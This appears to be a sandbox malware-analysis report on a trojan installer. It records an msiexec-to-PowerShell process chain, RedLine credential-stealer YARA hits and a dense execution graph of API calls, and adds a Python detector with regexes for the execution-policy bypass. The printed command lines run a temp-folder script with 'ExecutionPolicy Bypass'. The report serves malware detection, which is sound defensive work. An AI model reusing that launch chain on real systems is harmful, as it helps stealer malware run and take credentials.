Imagebase: 0xf00000
File size: 59'904 bytes
MD5 hash: 12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 19:35:15
Start date: 21/08/2023
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1692671532 "
Imagebase: 0xf00000
File size: 59'904 bytes
MD5 hash: 12C17B5A5C2A7B97342C362CA467E9A2
Has elevated privileges: true
Has administrator privileges: true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:4
                                                                                                                                                                      Start time:19:35:17
                                                                                                                                                                      Start date:21/08/2023
                                                                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding AADEFB259C244F0AA7BE078D54CFCDDA
                                                                                                                                                                      Imagebase:0xf00000
                                                                                                                                                                      File size:59'904 bytes
                                                                                                                                                                      MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:5
                                                                                                                                                                      Start time:19:35:18
                                                                                                                                                                      Start date:21/08/2023
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss77D9.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi77C5.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr77D6.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr77D7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                                                                                                                                                                      Imagebase:0x1150000
                                                                                                                                                                      File size:430'592 bytes
                                                                                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.523653859.0000000004FD2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:6
                                                                                                                                                                      Start time:19:35:18
                                                                                                                                                                      Start date:21/08/2023
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff766460000
                                                                                                                                                                      File size:625'664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true
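The chain recorded above (msiexec.exe /i Helper.msi, a MsiExec.exe -Embedding custom-action server, then powershell.exe run with -ExecutionPolicy Bypass on pss77D9.ps1 in the user's Temp directory, and its conhost.exe) is the behaviour behind the "Bypasses PowerShell execution policy" signature. The AI_SETUPEXEPATH/SETUPEXEDIR properties and the -propFile/-scriptFile/-propSep launcher arguments are the shape of an Advanced Installer PowerShell custom action, which is an observation about the command lines, not something the report states. The following detector is an added example, not part of the Joe Sandbox report or of the sample: it scores process-creation events for this pattern. The Sysmon-style field names (pid, ppid, image, cmdline), the parent/child links and the benign control event are constructed assumptions; only the command lines are copied from the report.

```python
"""
Added example (not from the Joe Sandbox report): flag powershell.exe launched by an
MSI custom-action server with an execution-policy bypass on a script in %TEMP%.

SAMPLE_EVENTS mirrors the command lines of Target IDs 3-6 above. The Sysmon-style
fields and the ppid links are assumptions made for this example.
"""
import re

# "-ExecutionPolicy Bypass" and the short forms "-ep"/"-ex" that PowerShell accepts
BYPASS_RE = re.compile(r"-(?:ExecutionPolicy|ep|ex)\s+bypass", re.IGNORECASE)
# The script handed to -File, quoted or unquoted
FILE_RE = re.compile(r'-File\s+"?([^"\s]+\.ps1)"?', re.IGNORECASE)
# Per-user temp directory, where the launcher wrote pss*.ps1 / scr*.ps1
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def is_msiexec(image: str) -> bool:
    return image.lower().endswith("\\msiexec.exe")


def is_powershell(image: str) -> bool:
    return image.lower().endswith(("\\powershell.exe", "\\pwsh.exe"))


def analyze(events):
    """Return [{"pid", "reasons"}] for every PowerShell event that matches at
    least one indicator. The indicators are independent, so a bypass without a
    temp script, or an msiexec parent alone, still surfaces."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if not is_powershell(e["image"]):
            continue
        reasons = []
        if BYPASS_RE.search(e["cmdline"]):
            reasons.append("execution policy bypass on the command line")
        m = FILE_RE.search(e["cmdline"])
        if m and TEMP_RE.search(m.group(1)):
            reasons.append("-File script lives in %TEMP%: " + m.group(1))
        parent = by_pid.get(e["ppid"])
        if parent and is_msiexec(parent["image"]) and "-Embedding" in parent["cmdline"]:
            reasons.append("parent is an MSI custom-action server (MsiExec.exe -Embedding)")
        if reasons:
            findings.append({"pid": e["pid"], "reasons": reasons})
    return findings


# Constructed events: command lines copied from the report, ppid links assumed.
# The last event is a benign control that must not be reported.
SAMPLE_EVENTS = [
    {"pid": 3, "ppid": 2, "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": r'"C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install\Helper.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1692671532 "'},
    {"pid": 4, "ppid": 3, "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": r"C:\Windows\syswow64\MsiExec.exe -Embedding AADEFB259C244F0AA7BE078D54CFCDDA"},
    {"pid": 5, "ppid": 4, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r' -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss77D9.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi77C5.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr77D6.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr77D7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."'},
    {"pid": 6, "ppid": 5, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 99, "ppid": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -File "C:\Scripts\inventory.ps1"'},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: " + "; ".join(f["reasons"]))
```

Running it reports only pid 5, with all three indicators. On real telemetry the parent check is the strongest of the three: legitimate installers do run PowerShell custom actions, so tune on the MSI path and signer rather than on the bypass flag alone, which Advanced Installer emits for benign packages too.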


                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:5.9%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:23.2%
                                                                                                                                                                        Total number of Nodes:1324
                                                                                                                                                                        Total number of Limit Nodes:62
execution_graph: the serialized node and edge data of the interactive graph (node IDs, code addresses such as c28d40, edge pairs and per-node annotations such as "26 API calls") is not reproduced here. Windows API names attached to the graph nodes: EnterCriticalSection, LeaveCriticalSection, SleepConditionVariableCS, RtlWakeAllConditionVariable, WaitForSingleObjectEx, SetEvent, ResetEvent, GetCurrentThreadId, GetCurrentProcess, GetProcessHeap, HeapAlloc, HeapFree, FlushInstructionCache, SetWindowLongW, LoadLibraryExA, LoadLibraryW, GetModuleHandleW, GetProcAddress, RtlEncodePointer, RtlDecodePointer, DecodePointer, CreateFileW, ReadFile, WriteFile, SetFilePointer, CloseHandle, FindFirstFileW, FindClose, MoveFileW, CopyFileW, DeleteFileW, GetTempPathW, GetTempFileNameW, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, FindResourceW, LoadResource, LockResource, SizeofResource, LoadStringW, SysAllocStringLen, SysFreeString, SHGetFolderPathW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHGetMalloc, GetSystemDirectoryW, GetWindowsDirectoryW, GetModuleFileNameW, GetEnvironmentVariableW, GetFileVersionInfoSizeW, GetFileVersionInfoW, GetLastError, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent. CRT symbols labelled on nodes: __Wcscoll, __cftof, _wcsrchr, __Init_thread_footer, __set_se_translator, ___std_exception_destroy, std::ios_base::_Ios_base_dtor.
46148->46143 46148->46144 46149 bb8810 25 API calls 46148->46149 46152 d1f9df 46148->46152 46149->46148 46150 d1f95e 46153 bb8810 25 API calls 46150->46153 46151->46150 46151->46152 46155 bb8190 25 API calls 46151->46155 46157 bb8810 25 API calls 46151->46157 46154 d852ff 25 API calls 46152->46154 46153->46142 46156 d1f9e4 46154->46156 46155->46151 46157->46151 46159 d1fa25 46158->46159 46160 d1fa2c 46158->46160 46159->46127 46161 d1fb37 46160->46161 46163 bb8190 25 API calls 46160->46163 46199 bea7a0 25 API calls 46160->46199 46161->46159 46200 d8a3fe 30 API calls 46161->46200 46201 d21240 26 API calls 46161->46201 46163->46160 46167 d20556 46166->46167 46184 d1fc83 std::ios_base::_Ios_base_dtor __Wcscoll 46166->46184 46167->46129 46168 d7fea9 2 API calls 46168->46184 46173 bbcd80 25 API calls 46173->46184 46175 d20f00 26 API calls 46175->46184 46176 d2058a 46178 d852ff 25 API calls 46176->46178 46177 bb8810 25 API calls 46177->46184 46179 d2058f 46178->46179 46180 bb8190 25 API calls 46180->46184 46184->46167 46184->46168 46184->46173 46184->46175 46184->46176 46184->46177 46184->46180 46185 d20279 46184->46185 46202 d215a0 46184->46202 46232 cc20b0 25 API calls 46184->46232 46233 bbee10 25 API calls 46184->46233 46234 d1e850 11 API calls __Init_thread_footer 46184->46234 46235 cc6fc0 25 API calls 2 library calls 46184->46235 46237 cd0790 25 API calls 2 library calls 46184->46237 46238 d21370 25 API calls std::ios_base::_Ios_base_dtor 46184->46238 46239 d21940 46184->46239 46244 be26a0 25 API calls std::ios_base::_Ios_base_dtor 46184->46244 46185->46184 46188 bb8810 25 API calls 46185->46188 46236 d1f2e0 46 API calls 2 library calls 46185->46236 46188->46185 46191 bbcdcd 46189->46191 46192 bbcd91 46189->46192 46190 bbce81 46191->46190 46193 bb8700 25 API calls 46191->46193 46192->46122 46194 bbce16 46193->46194 46195 bbce65 std::ios_base::_Ios_base_dtor 46194->46195 46196 d852ff 25 API calls 46194->46196 46195->46122 46196->46190 46197->46137 46198->46137 
46199->46160 46200->46161 46201->46161 46203 d215f0 46202->46203 46230 d21738 46202->46230 46204 d21792 46203->46204 46207 d21663 46203->46207 46208 d2163c 46203->46208 46249 bb86e0 25 API calls 46204->46249 46206 d852ff 25 API calls 46209 d217a1 46206->46209 46211 d7fea9 2 API calls 46207->46211 46214 d2164d 46207->46214 46208->46204 46210 d21647 46208->46210 46250 d21070 25 API calls std::ios_base::_Ios_base_dtor 46209->46250 46213 d7fea9 2 API calls 46210->46213 46211->46214 46213->46214 46216 d21940 25 API calls 46214->46216 46214->46230 46215 d217ad 46251 bd6690 25 API calls std::ios_base::_Ios_base_dtor 46215->46251 46218 d2169f 46216->46218 46220 d216b1 46218->46220 46221 d216fe 46218->46221 46219 d217bb 46224 d216e4 46220->46224 46227 d21940 25 API calls 46220->46227 46246 d21870 25 API calls 46221->46246 46223 d21709 46247 d21870 25 API calls 46223->46247 46245 d21070 25 API calls std::ios_base::_Ios_base_dtor 46224->46245 46227->46220 46228 d216f3 46231 d2175d std::ios_base::_Ios_base_dtor 46228->46231 46248 d21070 25 API calls std::ios_base::_Ios_base_dtor 46228->46248 46230->46206 46230->46231 46231->46184 46232->46184 46233->46184 46234->46184 46235->46184 46236->46185 46237->46184 46238->46184 46240 d7fea9 2 API calls 46239->46240 46241 d21989 46240->46241 46252 d21b70 46241->46252 46244->46184 46245->46228 46246->46223 46247->46228 46248->46230 46249->46230 46250->46215 46251->46219 46253 d21bb2 46252->46253 46254 d219b4 46252->46254 46255 d7fea9 2 API calls 46253->46255 46254->46184 46256 d21bd4 46255->46256 46257 bb7690 25 API calls 46256->46257 46258 d21bea 46257->46258 46259 bb7690 25 API calls 46258->46259 46260 d21bfa 46259->46260 46261 d21b70 25 API calls 46260->46261 46262 d21c4b 46261->46262 46263 d21b70 25 API calls 46262->46263 46263->46254 46264 d81bac 46272 d84c57 46264->46272 46266 d81bb6 46267 d81bc1 46266->46267 46278 d84d08 6 API calls ___vcrt_FlsSetValue 46266->46278 46269 d81bcf 46270 d81bdc 46269->46270 46271 d81bd5 
___vcrt_uninitialize_ptd 46269->46271 46271->46267 46279 d84b6c 46272->46279 46275 d84c8a TlsAlloc 46276 d84c7a FlsAlloc 46276->46266 46278->46269 46280 d84b89 46279->46280 46284 d84b8d 46279->46284 46280->46275 46280->46276 46281 d84bf5 GetProcAddress 46281->46280 46283 d84c03 46281->46283 46283->46280 46284->46280 46284->46281 46285 d84be6 46284->46285 46287 d84c0c LoadLibraryExW GetLastError LoadLibraryExW ___vcrt_FlsSetValue 46284->46287 46285->46281 46286 d84bee FreeLibrary 46285->46286 46286->46281 46287->46284 46288 d997af 46291 d997bc __cftof 46288->46291 46289 d997e7 RtlAllocateHeap 46290 d997fa __Wcscoll 46289->46290 46289->46291 46291->46289 46291->46290 46293 d954d3 EnterCriticalSection LeaveCriticalSection __cftof 46291->46293 46293->46291 46294 d7c94c 46295 d7c93b 46294->46295 46295->46294 46297 d7d43d 46295->46297 46323 d7d19b 46297->46323 46299 d7d44d 46300 d7d4aa 46299->46300 46311 d7d4ce 46299->46311 46332 d7d3db 6 API calls 3 library calls 46300->46332 46302 d7d4b5 RaiseException 46303 d7d6a3 46302->46303 46303->46295 46304 d7d546 LoadLibraryExA 46305 d7d5a7 46304->46305 46306 d7d559 GetLastError 46304->46306 46310 d7d5b9 46305->46310 46312 d7d5b2 FreeLibrary 46305->46312 46307 d7d582 46306->46307 46308 d7d56c 46306->46308 46333 d7d3db 6 API calls 3 library calls 46307->46333 46308->46305 46308->46307 46309 d7d617 GetProcAddress 46314 d7d627 GetLastError 46309->46314 46319 d7d675 46309->46319 46310->46309 46310->46319 46311->46304 46311->46305 46311->46310 46311->46319 46312->46310 46316 d7d63a 46314->46316 46315 d7d58d RaiseException 46315->46303 46316->46319 46334 d7d3db 6 API calls 3 library calls 46316->46334 46335 d7d3db 6 API calls 3 library calls 46319->46335 46320 d7d65b RaiseException 46321 d7d19b DloadAcquireSectionWriteAccess 6 API calls 46320->46321 46322 d7d672 46321->46322 46322->46319 46324 d7d1a7 46323->46324 46325 d7d1cd 46323->46325 46336 d7d244 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 
46324->46336 46325->46299 46327 d7d1ac 46328 d7d1c8 46327->46328 46337 d7d36d VirtualQuery GetSystemInfo VirtualProtect DloadProtectSection 46327->46337 46338 d7d1ce GetModuleHandleW GetProcAddress GetProcAddress 46328->46338 46331 d7d416 46331->46299 46332->46302 46333->46315 46334->46320 46335->46303 46336->46327 46337->46328 46338->46331 46339 cb2170 46340 cb21a7 46339->46340 46344 cb21e7 46339->46344 46341 d80372 6 API calls 46340->46341 46342 cb21b1 46341->46342 46342->46344 46345 d80328 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 46342->46345 46345->46344 46346 cc1850 46347 cc189b 46346->46347 46350 cc1888 46346->46350 46352 cb1130 31 API calls 2 library calls 46347->46352 46349 cc18a5 46351 bb8810 25 API calls 46349->46351 46351->46350 46352->46349 46353 bc8da1 46354 bc8e27 46353->46354 46355 bc8e9b 46354->46355 46356 bc8e4c GetWindowLongW CallWindowProcW 46354->46356 46357 bc8e36 CallWindowProcW 46354->46357 46356->46355 46358 bc8e80 GetWindowLongW 46356->46358 46357->46355 46358->46355 46359 bc8e8d SetWindowLongW 46358->46359 46359->46355 46360 ce64f0 46379 cef5c0 46360->46379 46362 ce652c 46363 ce6667 46362->46363 46364 ce6543 CreateFileW 46362->46364 46365 ce6581 SetFilePointer 46364->46365 46368 ce6570 46364->46368 46367 ce65ae 46365->46367 46365->46368 46366 ce665a FindCloseChangeNotification 46366->46363 46369 cae930 38 API calls 46367->46369 46368->46363 46368->46366 46370 ce65bd 46369->46370 46371 ce65ca 46370->46371 46372 ce65d8 ReadFile 46370->46372 46373 bba550 26 API calls 46371->46373 46374 ce65fd 46372->46374 46375 ce65eb 46372->46375 46376 ce65d5 46373->46376 46374->46368 46378 ce662a 46374->46378 46375->46374 46377 d092e0 89 API calls 46375->46377 46376->46372 46377->46374 46378->46363 46380 cef667 46379->46380 46387 cf1100 HeapAlloc 46380->46387 46382 cef66e 46383 bbab90 12 API calls 46382->46383 46384 cef73e 46383->46384 46385 bba850 HeapAlloc 46384->46385 46386 cef797 46385->46386 46387->46382 
46388 be0d20 46389 d7fea9 2 API calls 46388->46389 46390 be0d64 46389->46390 46393 bce010 25 API calls std::ios_base::_Ios_base_dtor 46390->46393 46392 be0daf 46393->46392 46394 cf09f0 46395 cf0a2e 46394->46395 46396 cf0ab6 46394->46396 46426 cf1300 HeapAlloc 46395->46426 46489 cf1140 94 API calls 46396->46489 46399 cf0ac0 46401 bd1a90 26 API calls 46399->46401 46400 cf0a36 46402 cf0b25 46400->46402 46403 cf0a49 46400->46403 46408 cf0ab2 46401->46408 46404 bba850 HeapAlloc 46402->46404 46409 bd1a90 26 API calls 46403->46409 46405 cf0b2f 46404->46405 46406 cf0b65 46405->46406 46421 cf0be1 46405->46421 46407 cf0bcb 46406->46407 46410 bbab90 12 API calls 46406->46410 46411 cf0a70 46409->46411 46413 cf0b6f 46410->46413 46479 cf1370 46411->46479 46412 cf0cb5 46416 bba850 HeapAlloc 46412->46416 46414 cf0cbf 46413->46414 46415 cf0b79 46413->46415 46420 bba850 HeapAlloc 46414->46420 46427 cf0cd0 46415->46427 46416->46414 46418 cf0c63 46425 cf0b9e 46418->46425 46497 d89d16 46418->46497 46422 cf0cc9 46420->46422 46421->46412 46421->46418 46490 ced7e0 46421->46490 46426->46400 46500 cf1100 HeapAlloc 46427->46500 46429 cf0d1d 46430 ced7e0 3 API calls 46429->46430 46431 cf0d34 46429->46431 46430->46431 46432 bd1a90 26 API calls 46431->46432 46433 cf0d61 46432->46433 46434 cf102e 46433->46434 46435 cf101a 46433->46435 46438 cf0ddf 46433->46438 46437 bba850 HeapAlloc 46434->46437 46436 bba850 HeapAlloc 46435->46436 46439 cf1024 46436->46439 46440 cf1038 46437->46440 46636 ccc040 86 API calls 2 library calls 46438->46636 46442 bba850 HeapAlloc 46439->46442 46442->46434 46443 cf0df0 46501 bd11b0 46443->46501 46445 cf0e01 46446 cf0e18 46445->46446 46447 bbab90 12 API calls 46445->46447 46446->46445 46448 cf0e25 46447->46448 46448->46439 46449 cf0e2f 46448->46449 46450 cf0e4d 46449->46450 46451 cf0e58 46449->46451 46452 bba140 29 API calls 46450->46452 46637 cb6270 46451->46637 46458 cf0e56 46452->46458 46454 cf0e62 _wcsrchr 46455 cf0e9c 46454->46455 46454->46458 46456 cf0eb0 
46455->46456 46575 cf1100 HeapAlloc 46455->46575 46456->46455 46458->46454 46458->46455 46460 bd11b0 94 API calls 46458->46460 46459 cf0ec1 46461 cf0ecd 46459->46461 46462 cf0ee6 46459->46462 46460->46455 46463 cf0ee1 46461->46463 46466 ced7e0 3 API calls 46461->46466 46462->46463 46464 ced7e0 3 API calls 46462->46464 46648 cf27f0 46463->46648 46467 cf0f13 46464->46467 46466->46463 46576 cf3e10 46467->46576 46468 cf0fad 46471 d89d16 ___std_exception_destroy 2 API calls 46468->46471 46476 cf0f48 46468->46476 46470 cf0f20 46473 cf0f59 46470->46473 46477 cf0f37 46470->46477 46471->46476 46472 cf0fec 46472->46425 46473->46463 46475 d89d16 ___std_exception_destroy 2 API calls 46473->46475 46474 d89d16 ___std_exception_destroy 2 API calls 46474->46472 46475->46463 46476->46472 46476->46474 46477->46476 46478 d89d16 ___std_exception_destroy 2 API calls 46477->46478 46478->46476 46480 cf13a5 46479->46480 46481 bba850 HeapAlloc 46480->46481 46486 cf13ae 46480->46486 46482 cf1baa 46481->46482 46483 bba850 HeapAlloc 46482->46483 46484 cf1bb4 46483->46484 46485 bba850 HeapAlloc 46484->46485 46487 cf1bbe 46485->46487 46486->46408 46488 bba850 HeapAlloc 46487->46488 46489->46399 46491 ced81a 46490->46491 46495 ced82b 46490->46495 46492 bba850 HeapAlloc 46491->46492 46491->46495 46493 ced8b5 46492->46493 46494 ced8f1 46493->46494 46496 d89d16 ___std_exception_destroy 2 API calls 46493->46496 46494->46421 46495->46421 46496->46494 46980 d9820d 46497->46980 46499 d89d2e 46499->46425 46500->46429 46508 bd1241 46501->46508 46510 bd11d6 __Wcscoll 46501->46510 46502 bba850 HeapAlloc 46503 bd128c 46502->46503 46504 bd12fb 46503->46504 46505 bd12ee FindClose 46503->46505 46718 bba4a0 HeapAlloc 46504->46718 46505->46504 46506 bd126f 46506->46445 46508->46502 46508->46506 46509 bd1317 46511 bbab90 12 API calls 46509->46511 46510->46508 46717 d852ef 25 API calls __cftof 46510->46717 46516 bd1329 46511->46516 46513 bd16dc 46514 bba850 HeapAlloc 46513->46514 46515 bd16e6 46514->46515 46517 
bba380 26 API calls 46515->46517 46516->46513 46518 bd1351 46516->46518 46521 bd135f 46516->46521 46519 bd172f 46517->46519 46520 bba140 29 API calls 46518->46520 46523 bd192c 46519->46523 46525 bd1950 46519->46525 46538 bd1765 46519->46538 46524 bd135d 46520->46524 46521->46521 46719 bba6d0 26 API calls 2 library calls 46521->46719 46523->46445 46526 bd15cc 46524->46526 46528 bd14f5 FindFirstFileW 46524->46528 46529 bd13a6 PathIsUNCW 46524->46529 46527 bba850 HeapAlloc 46525->46527 46526->46445 46533 bd195a 46527->46533 46528->46526 46532 bd150d GetFullPathNameW 46528->46532 46530 bd13bb 46529->46530 46531 bd1485 46529->46531 46720 bc4a70 38 API calls 2 library calls 46530->46720 46770 bc4a70 38 API calls 2 library calls 46531->46770 46536 bd1526 46532->46536 46574 bd1661 46532->46574 46537 bd1541 GetFullPathNameW 46536->46537 46541 bd155a 46537->46541 46540 bd11b0 86 API calls 46538->46540 46539 bba850 HeapAlloc 46539->46513 46542 bd17a1 46540->46542 46543 bd1606 46541->46543 46553 bd158e 46541->46553 46541->46574 46542->46523 46544 bd17d4 PathIsUNCW 46542->46544 46557 bd1618 _wcsrchr 46543->46557 46772 bba550 26 API calls 2 library calls 46543->46772 46546 bd17e8 46544->46546 46547 bd18b7 46544->46547 46545 bd13c3 46545->46528 46721 bc4e60 46545->46721 46776 bc4a70 38 API calls 2 library calls 46546->46776 46777 bc4a70 38 API calls 2 library calls 46547->46777 46552 bd15c4 SetLastError 46552->46526 46553->46552 46559 bd15b7 FindClose 46553->46559 46555 bd143e 46556 bd1a90 26 API calls 46555->46556 46560 bd1451 46556->46560 46558 bd1638 _wcsrchr 46557->46558 46773 bba550 26 API calls 2 library calls 46557->46773 46564 bd164b 46558->46564 46566 bd1665 46558->46566 46559->46552 46560->46528 46562 bd1476 46560->46562 46771 bd1960 26 API calls 2 library calls 46562->46771 46563 bd17f0 46563->46523 46567 bc4e60 82 API calls 46563->46567 46565 bd16b3 46564->46565 46564->46574 46774 bba550 26 API calls 2 library calls 46564->46774 46565->46526 46566->46574 46775 bba550 
26 API calls 2 library calls 46566->46775 46568 bd1871 46567->46568 46572 bd1a90 26 API calls 46568->46572 46573 bd1883 46572->46573 46573->46523 46778 bd1960 26 API calls 2 library calls 46573->46778 46574->46539 46574->46565 46575->46459 46577 cf4246 46576->46577 46614 cf3e6a 46576->46614 46577->46470 46578 cf4289 46579 bba850 HeapAlloc 46578->46579 46580 cf4293 46579->46580 46581 bba850 HeapAlloc 46580->46581 46583 cf429d 46581->46583 46582 bba380 26 API calls 46582->46614 46587 cf42e8 46583->46587 46829 bba550 26 API calls 2 library calls 46583->46829 46584 bbab90 12 API calls 46584->46614 46586 cf427f 46589 bba850 HeapAlloc 46586->46589 46588 cf43e2 46587->46588 46591 cf4337 46587->46591 46830 cccae0 82 API calls 46587->46830 46616 cf43fe 46588->46616 46783 cccf10 46588->46783 46589->46578 46590 cf4028 FindFirstFileW 46592 cf4063 FindClose 46590->46592 46622 cf3f1d __Wcscoll 46590->46622 46595 cf43c9 46591->46595 46600 bbab90 12 API calls 46591->46600 46592->46622 46594 cf4524 46594->46470 46595->46470 46597 bbab90 12 API calls 46597->46622 46598 cf431c 46598->46588 46598->46591 46599 bbab90 12 API calls 46599->46616 46602 cf4349 46600->46602 46601 d104e0 HeapAlloc CreateFileW 46601->46622 46603 cf453a 46602->46603 46604 cf4351 46602->46604 46605 bba850 HeapAlloc 46603->46605 46606 bd11b0 94 API calls 46604->46606 46612 cf4544 46605->46612 46608 cf4374 46606->46608 46607 cf4203 46607->46577 46615 cf4235 CloseHandle 46607->46615 46610 cf4399 46608->46610 46619 cf438b 46608->46619 46609 cf444d CreateFileW 46808 ccaaa0 46609->46808 46831 cff8f0 54 API calls 46610->46831 46618 bba850 HeapAlloc 46612->46618 46614->46577 46614->46578 46614->46580 46614->46582 46614->46584 46614->46586 46621 cf418b CloseHandle 46614->46621 46614->46622 46615->46577 46616->46594 46616->46599 46616->46603 46616->46609 46623 cf44bd SetFilePointer SetEndOfFile 46616->46623 46617 cf41b1 46617->46607 46624 cf459f 46618->46624 46625 bd11b0 94 API calls 46619->46625 46620 cf43a7 46620->46595 
46621->46614 46622->46586 46622->46590 46622->46597 46622->46601 46622->46614 46622->46617 46623->46616 46626 cf44e6 FindCloseChangeNotification 46623->46626 46627 cf4686 46624->46627 46629 cf46c2 46624->46629 46625->46610 46626->46616 46628 cf4699 46627->46628 46630 d89d16 ___std_exception_destroy 2 API calls 46627->46630 46628->46470 46631 bba850 HeapAlloc 46629->46631 46630->46628 46632 cf46cc 46631->46632 46633 cf4737 std::ios_base::_Ios_base_dtor 46632->46633 46634 d852ff 25 API calls 46632->46634 46633->46470 46635 cf476c 46634->46635 46636->46443 46638 cb62da 46637->46638 46639 cb627d MultiByteToWideChar 46637->46639 46918 bba4a0 HeapAlloc 46638->46918 46639->46638 46640 cb6295 46639->46640 46642 cb62b0 MultiByteToWideChar 46640->46642 46644 cb62e9 46642->46644 46645 cb62c7 46642->46645 46643 cb62e1 46643->46454 46646 bba850 HeapAlloc 46644->46646 46645->46454 46647 cb62f3 46646->46647 46649 bbab90 12 API calls 46648->46649 46650 cf2844 46649->46650 46651 cf39de 46650->46651 46653 bbab90 12 API calls 46650->46653 46652 bba850 HeapAlloc 46651->46652 46654 cf286a 46653->46654 46654->46651 46656 bd1a90 26 API calls 46654->46656 46681 cf296c 46654->46681 46655 bbab90 12 API calls 46710 cf29e3 std::ios_base::_Ios_base_dtor __Wcscoll 46655->46710 46660 cf28b0 46656->46660 46657 cf35cb 46926 d11610 46657->46926 46658 bd1a90 26 API calls 46662 cf2915 46658->46662 46660->46658 46661 cf39c5 46660->46661 46663 bba850 HeapAlloc 46661->46663 46662->46661 46672 cf2935 46662->46672 46666 cf39cf 46663->46666 46664 d7fea9 2 API calls 46664->46710 46665 cf3616 46667 cf37ab 46665->46667 46673 cf363d CreateEventW 46665->46673 46674 cf3672 CreateThread 46665->46674 46668 bba850 HeapAlloc 46666->46668 46669 cf37cd CloseHandle 46667->46669 46670 cf375a 46667->46670 46671 cf39d9 46668->46671 46669->46670 46675 cf3806 CloseHandle 46670->46675 46676 cf3813 46670->46676 46679 d852ff 25 API calls 46671->46679 46680 bd11b0 94 API calls 46672->46680 46683 cf3653 46673->46683 46677 cf36ab 
